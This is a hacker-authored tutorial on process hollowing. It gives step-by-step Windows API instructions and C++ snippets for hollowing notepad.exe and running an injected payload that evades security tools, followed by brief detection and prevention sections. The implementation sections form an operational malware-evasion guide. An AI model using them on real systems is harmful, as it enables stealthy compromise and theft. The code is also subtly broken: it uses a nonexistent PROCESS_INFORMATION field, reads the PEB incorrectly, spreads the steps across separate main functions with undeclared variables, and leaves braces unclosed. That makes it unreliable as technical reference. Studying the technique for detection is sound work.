Digital Shadows: Unmasking the Art of Process Hollowing in the Hacker's Underworld

Written By: Dread.Reaper - Dark Legion

Introduction:

In the shadowy recesses of cyberspace, a realm governed by bits and bytes, an elite group of
digital warriors continuously seeks new methods for penetrating the defenses of their unsuspecting
targets. These hackers, skilled in the arcane arts of computer manipulation, employ a diverse arsenal of
techniques to infiltrate systems, exfiltrate sensitive data, and wreak havoc upon the digital landscape.
Among their most potent weapons lies a cunning and elusive method known as process hollowing,
which masterfully evades detection while sowing chaos in its wake.

Process hollowing, a sophisticated form of code injection, is the digital equivalent of a

chameleon. Its raison d'être is to obfuscate malicious code, surreptitiously embedding it within the
confines of seemingly innocuous processes. This cunning subterfuge allows the nefarious payload to slip
past the watchful eyes of even the most advanced security systems, silently biding its time until it
springs forth to execute its malevolent intentions.

To accomplish this devious feat, hackers leverage a series of intricate API function calls,
manipulating the inner workings of the operating system to their advantage. The process begins with
the creation of a legitimate process in a suspended state, such as the seemingly harmless notepad.exe.
The unsuspecting victim remains oblivious, unaware that the seeds of destruction have already been
sown. Next, the hacker unmaps the memory content of the target process, hollowing it out to create a
clandestine lair for their malicious payload. With the hollowed space prepared, the attacker allocates
new memory and writes the malicious code into the vacated recesses.

As the final act of subterfuge, the hacker manipulates the thread context, directing the hijacked
process to execute the malicious payload upon resumption. With the stage set and the machinations
complete, the suspended process springs back to life, carrying out its sinister payload unbeknownst to
its hapless host.

Process hollowing is but one of many treacherous tools in the hacker's toolkit, an insidious
reminder of the ever-evolving nature of cyber threats. As defenders scramble to adapt and respond,
hackers continue to push the boundaries of their craft, constantly seeking new vulnerabilities to exploit
and innovative methods to remain undetected. In this digital game of cat and mouse, the stakes are
high, and the battle rages on.
I. Introduction

Process hollowing, an advanced code injection technique, is utilized by malicious actors to

execute harmful payloads within legitimate processes.

By leveraging process hollowing, attackers can evade detection from security tools and
knowledgeable users.

II. Overview of Process Hollowing

Process hollowing involves the following main steps:

• Creating a legitimate process in a suspended state

• Unmapping the memory content of the legitimate process
• Allocating new memory space for the malicious payload
• Writing the malicious payload into the newly allocated memory space
• Resuming the suspended process to execute the malicious payload

III. Key API Function Calls in Process Hollowing

The process-hollowing technique employs a series of API function calls, which include:

• CreateProcess: Initiates a legitimate process in a suspended state

• ZwUnmapViewOfSection/NtUnmapViewOfSection: Unmaps the memory space of a specific section of a
process, creating a hollowed section
• VirtualAllocEx: Allocates new memory space within the hollowed section
• WriteProcessMemory: Writes the malicious content into the allocated memory space
• SetThreadContext and ResumeThread: Restores the context to the thread and resumes the process,
allowing the execution of the malicious payload
IV. Step-by-Step Implementation of Process Hollowing

Creating a Legitimate Process in a Suspended State

• Choose a target process: Select a legitimate process to serve as the host for the malicious payload. A
commonly targeted process is notepad.exe, as it is less likely to arouse suspicion.
• Use CreateProcess API function: Utilize the CreateProcess function with the dwCreationFlags parameter
set to CREATE_SUSPENDED, which ensures that the process remains in a suspended state until further
action is taken.

Unmapping the Memory Content of the Legitimate Process

• Locate the process's entry point: Retrieve the base address of the target process's entry point by
accessing the PEB (Process Environment Block) structure.
• Use ZwUnmapViewOfSection/NtUnmapViewOfSection API functions: Invoke these functions to unmap
the entire memory space of a specific section of the process, creating a hollowed section.

V. In-Depth Technical Breakdown

Creating a Legitimate Process in a Suspended State

1. Choose a target process

i. Identify a suitable process: Select a process that is less likely to raise suspicion, such as
notepad.exe, calc.exe, or explorer.exe.
2. Use CreateProcess API function
i. Set up PROCESS_INFORMATION and STARTUPINFO structures: These structures will store
information about the new process and its main thread.
ii. Call CreateProcess: Invoke CreateProcess with the chosen target process, passing the
appropriate flags (CREATE_SUSPENDED) and structures (PROCESS_INFORMATION and
STARTUPINFO) as parameters.
iii. Verify successful process creation: Ensure that the process is created in a suspended state and
that the necessary handles (process and thread handles) are obtained.
Unmapping the Memory Content of the Legitimate Process

1. Locate the process's entry point

i. Access the PEB structure: Read the target process's PEB by using the ReadProcessMemory API
function with the process handle obtained in step 1.
ii. Retrieve the base address: Extract the base address of the target process's entry point from the
PEB's ImageBaseAddress field.
2. Use ZwUnmapViewOfSection/NtUnmapViewOfSection API functions
i. Obtain a handle to ntdll.dll: Load ntdll.dll dynamically and acquire a handle using the
GetModuleHandle API function.
ii. Locate ZwUnmapViewOfSection/NtUnmapViewOfSection: Use the GetProcAddress API function
to find the addresses of the ZwUnmapViewOfSection or NtUnmapViewOfSection functions.
iii. Call ZwUnmapViewOfSection/NtUnmapViewOfSection: Invoke the chosen function, passing the
process handle and the base address of the target process's entry point as parameters.
iv. Verify successful unmapping: Confirm that the memory space of the specific section of the
process has been unmapped, creating a hollowed section.

Allocating New Memory Space for the Malicious Payload

1. Determine the size of the malicious payload: Calculate the memory size required to accommodate
the malicious payload.
2. Use VirtualAllocEx API function
i. Prepare parameters for VirtualAllocEx: Set up the appropriate parameters, including the target
process handle, the base address of the target process's entry point, the calculated memory size,
and allocation type (MEM_COMMIT | MEM_RESERVE) and protection flags
(PAGE_EXECUTE_READWRITE).
ii. Call VirtualAllocEx: Invoke the VirtualAllocEx function with the prepared parameters to allocate
new memory space within the hollowed section of the target process.
iii. Verify successful allocation: Ensure that the new memory space has been allocated and that
the base address of the allocated memory matches the base address of the target process's entry
point.
Writing the Malicious Payload into the Newly Allocated Memory Space

1. Prepare the malicious payload: Obtain or generate the malicious payload to be injected into the
target process.
2. Use WriteProcessMemory API function
i. Set up parameters for WriteProcessMemory: Prepare the necessary parameters, including the
target process handle, the base address of the newly allocated memory, the malicious payload,
and the size of the payload.
ii. Call WriteProcessMemory: Invoke the WriteProcessMemory function with the prepared
parameters to write the malicious payload into the allocated memory space within the hollowed
section of the target process.
iii. Verify successful writing: Ensure that the malicious payload has been written to the allocated
memory space without any errors.

Resuming the Suspended Process to Execute the Malicious Payload

1. Use SetThreadContext API function

i. Obtain the original thread context: Retrieve the original thread context of the target process's
main thread using the GetThreadContext API function with the thread handle obtained in step 1.
ii. Modify the thread context: Update the thread context's EIP/RIP (Instruction Pointer) register
value to point to the entry point of the malicious payload within the newly allocated memory
space.
iii. Set the new thread context: Invoke the SetThreadContext function with the modified thread
context and the thread handle as parameters, applying the changes to the target process's main
thread.
2. Use ResumeThread API function
i. Call ResumeThread: Invoke the ResumeThread function with the thread handle as a parameter
to resume the suspended process and initiate the execution of the malicious payload.
ii. Verify successful resumption: Ensure that the process has been resumed and that the malicious
payload is executing as intended.

VI. Detection and Prevention Techniques

Detecting Process Hollowing

1. Monitoring process behavior: Observe processes for unusual behavior, such as a legitimate
process spawning another process or establishing network connections that are not typical for
the process in question.
2. Memory scanning: Perform memory scans to identify discrepancies between the process
memory and the corresponding file on disk.
3. Heuristic analysis: Use heuristic algorithms to detect potential process hollowing indicators, such
as a high number of API calls associated with process manipulation.
Prevention Techniques

1. Employ strong security software: Implement comprehensive security solutions, such as antivirus
software, intrusion detection systems (IDS), and host-based intrusion prevention systems (HIPS)
to monitor and block suspicious activities.
2. Regularly update software: Keep operating systems, applications, and security software up-to-
date to minimize vulnerabilities that attackers might exploit.
3. Limit user privileges: Restrict user privileges to minimize the potential impact of an attack by
ensuring that users have the least amount of access necessary to perform their tasks.
4. Use application whitelisting: Implement application whitelisting to prevent the execution of
unauthorized programs or scripts.
5. Employee training and awareness: Educate users about the risks associated with process
hollowing and other advanced threats, encouraging them to follow best security practices.

VII. Code Examples of Process Hollowing

Please note that the following code examples are for educational purposes only and should not be
used for malicious activities. The examples are presented using C++.
Creating a Legitimate Process in a Suspended State:

#include <Windows.h>

#include <iostream>

int main() {

PROCESS_INFORMATION pi;

STARTUPINFO si;

memset(&si, 0, sizeof(si));

si.cb = sizeof(si);

BOOL result = CreateProcess(

"C:\\Windows\\System32\\notepad.exe", // Target process path

NULL,

NULL,

NULL,

FALSE,

CREATE_SUSPENDED, // Ensure process is created in a suspended state

NULL,

NULL,

&si,

&pi

);

if (result) {

std::cout << "Process created successfully." << std::endl;

} else {

std::cout << "Failed to create process." << std::endl;

return 0;

}
Unmapping the Memory Content of the Legitimate Process:

#include <Windows.h>

#include <winternl.h>

#include <iostream>

typedef NTSTATUS(NTAPI* NtUnmapViewOfSectionFunc)(

HANDLE ProcessHandle,

PVOID BaseAddress

);

int main() {

// Assuming you have created a process in a suspended state (using the previous code example)

PEB peb;

SIZE_T readBytes;

ReadProcessMemory(pi.hProcess, pi.lpBaseOfDll, &peb, sizeof(peb), &readBytes);

HMODULE ntdll = GetModuleHandle("ntdll.dll");

NtUnmapViewOfSectionFunc NtUnmapViewOfSection = (NtUnmapViewOfSectionFunc)GetProcAddress(ntdll, "NtUnmapViewOfSection");

NTSTATUS status = NtUnmapViewOfSection(pi.hProcess, peb.ImageBaseAddress);

if (status == 0) {

std::cout << "Successfully unmapped memory content." << std::endl;

} else {

std::cout << "Failed to unmap memory content." << std::endl;

// Continue with process hollowing steps...

return 0;

}
Allocating New Memory Space for the Malicious Payload:

#include <Windows.h>

#include <iostream>

int main() {

// Assuming you have created a process in a suspended state and unmapped memory content (using previous code examples)

PVOID newBaseAddress = VirtualAllocEx(

pi.hProcess,

peb.ImageBaseAddress, // Allocate memory at the same base address

0x1000, // Arbitrary size for demonstration purposes

MEM_COMMIT | MEM_RESERVE,

PAGE_EXECUTE_READWRITE

);

if (newBaseAddress) {

std::cout << "Successfully allocated new memory space." << std::endl;

} else {

std::cout << "Failed to allocate new memory space." << std::endl;

// Continue with process hollowing steps...

return 0;

}
Writing the Malicious Payload into the Newly Allocated Memory Space:

#include <Windows.h>

#include <iostream>

int main() {

// Assuming you have created a process in a suspended state, unmapped memory content, and allocated new memory space (using previous
code examples)

BYTE payload[] = { 0x90, 0x90, 0x90 }; // NOP sled as an example

SIZE_T writtenBytes;

BOOL writeResult = WriteProcessMemory(

pi.hProcess,

newBaseAddress,

payload,

sizeof(payload),

&writtenBytes

);

if (writeResult) {

std::cout << "Successfully wrote malicious payload." << std::endl;

} else {

std::cout << "Failed to write malicious payload." << std::endl;

return 0;

}
Resuming the Suspended Process to Execute the Malicious Payload:

#include <Windows.h>

#include <iostream>

int main() {

// Assuming you have created a process in a suspended state, unmapped memory content, allocated new memory space, and written the
malicious payload (using previous code examples)

CONTEXT ctx;

ctx.ContextFlags = CONTEXT_FULL;

GetThreadContext(pi.hThread, &ctx);

ctx.Eip = (DWORD)newBaseAddress; // Set the EIP register value to the entry point of the malicious payload

SetThreadContext(pi.hThread, &ctx);

DWORD resumeResult = ResumeThread(pi.hThread);

if (resumeResult != (DWORD)-1) {

std::cout << "Successfully resumed the suspended process." << std::endl;

} else {

std::cout << "Failed to resume the suspended process." << std::endl;

// Cleanup: Close process and thread handles

CloseHandle(pi.hProcess);

CloseHandle(pi.hThread);

return 0;

}
IIX. Real-World Use Cases and Consequences

Real-World Use Cases:

1. Cyber espionage: Process hollowing can be employed by cybercriminals and nation-state actors
to infiltrate target systems, extract sensitive information, and maintain a covert presence within
the target network.
2. Banking trojans: Banking trojans can utilize process hollowing to inject malicious code into
legitimate processes, allowing them to operate undetected while monitoring and intercepting
sensitive financial information from users.
3. Ransomware: Ransomware attacks often use process hollowing to conceal their malicious
activities, encrypting files and demanding a ransom without being detected by security software.
4. Cryptocurrency mining: Some cryptocurrency mining malware leverages process hollowing to
discreetly mine digital currencies using the target system's resources, effectively hiding the
malicious activity.

Consequences:

a. Data theft: Process hollowing can lead to the unauthorized access and exfiltration of sensitive data,
resulting in financial losses, intellectual property theft, and damage to an organization's reputation.

b. Disruption of services: Malicious activities enabled by process hollowing can cause disruptions to
critical services, impacting business operations and user experiences.

c. Legal and regulatory repercussions: Organizations that fail to detect and address process hollowing-
related threats may face legal and regulatory penalties, especially if the breach involves personal or
sensitive data.

d. Increased costs: Recovering from the impact of process hollowing attacks can be costly, with
organizations needing to invest in incident response, remediation, and system hardening.

IX. Best Practices and Additional Security Measures

IX. Best Practices:

1. Patch management: Regularly apply patches and updates to operating systems, software
applications, and security tools to minimize vulnerabilities that attackers could exploit to
perform process hollowing.
2. Network segmentation: Implement network segmentation to restrict the lateral movement
of attackers, making it more difficult for them to access sensitive information or critical
systems.
3. Application control: Enforce strict application control policies, such as application
whitelisting and least privilege access, to minimize the possibility of unauthorized code
execution.
4. Monitor and analyze system logs: Regularly review and analyze system logs for signs of
suspicious activity, such as unusual process behavior, API calls, or network connections.

Additional Security Measures:

a. Behavioral analysis: Employ advanced security solutions that use behavioral analysis and
machine learning to detect and block process hollowing attempts in real-time.
b. Endpoint Detection and Response (EDR): Implement EDR solutions to continuously monitor
endpoint activity, identify potential threats, and provide rapid response capabilities.
c. Threat hunting: Proactively search for signs of process hollowing and other advanced threats
within your environment by conducting regular threat hunting exercises.
d. Security awareness training: Educate employees about the risks associated with process
hollowing and other advanced threats, and provide them with the knowledge and tools to
recognize and report suspicious activities.

By implementing best practices and additional security measures, organizations can significantly
reduce the risk of process hollowing attacks and better defend their systems against this advanced code
injection technique.
X. Conclusion:

As we traverse the murky depths of the digital underworld, navigating the intricate labyrinth of
code and circuitry, we find ourselves at the end of our exploration into the enigmatic technique of
process hollowing. This nefarious tactic, wielded with ruthless precision by the clandestine architects of
cyber chaos, has proven itself to be a formidable weapon in the hacker's ever-expanding arsenal. Having
delved into the intricate mechanics of this stealthy subterfuge, we emerge with a newfound
understanding and respect for the cunning and resourcefulness of these elusive digital adversaries.

The art of process hollowing exemplifies the relentless drive for innovation that defines the
hacker's modus operandi. By exploiting the innate vulnerabilities of operating systems and security
measures, these digital maestros manipulate memory, threads, and APIs, successfully evading detection
and orchestrating their malicious masterpieces from the shadows. However, as we have seen, with great
power comes great responsibility – or, in this case, the potential for catastrophic consequences.

The ramifications of process hollowing ripple across the digital landscape, leaving a trail of
destruction in its wake. From cyber espionage and banking trojans to ransomware and cryptocurrency
mining, the diverse and insidious applications of this technique pose a formidable challenge for
cybersecurity professionals and organizations worldwide. But as the battle for digital supremacy wages
on, so too must the forces of good adapt and evolve in response to the ever-shifting landscape of cyber
threats.

As we forge ahead into the uncharted realms of cyberspace, armed with our newfound
knowledge of process hollowing, we must remain ever-vigilant in our quest to defend the digital
frontier. By embracing a proactive and comprehensive approach to cybersecurity, incorporating cutting-
edge tools such as behavioral analysis, EDR, and threat hunting, we can bolster our defenses against the
onslaught of cyberattacks. Ultimately, it is through the relentless pursuit of knowledge and the
unwavering determination to protect our digital domains that we may rise to the challenge and stand
firm against the forces of chaos that lurk in the shadows.

In the eternal struggle between the defenders of the digital realm and the cunning architects of
cyber chaos, process hollowing serves as a stark reminder of the need for constant vigilance,
adaptability, and innovation. As we continue our journey into the unknown, let us never forget the
lessons learned from this exploration into the hacker's hidden world, for it is only through knowledge
and understanding that we can hope to prevail in the ever-evolving war for the soul of cyberspace.

/EOF/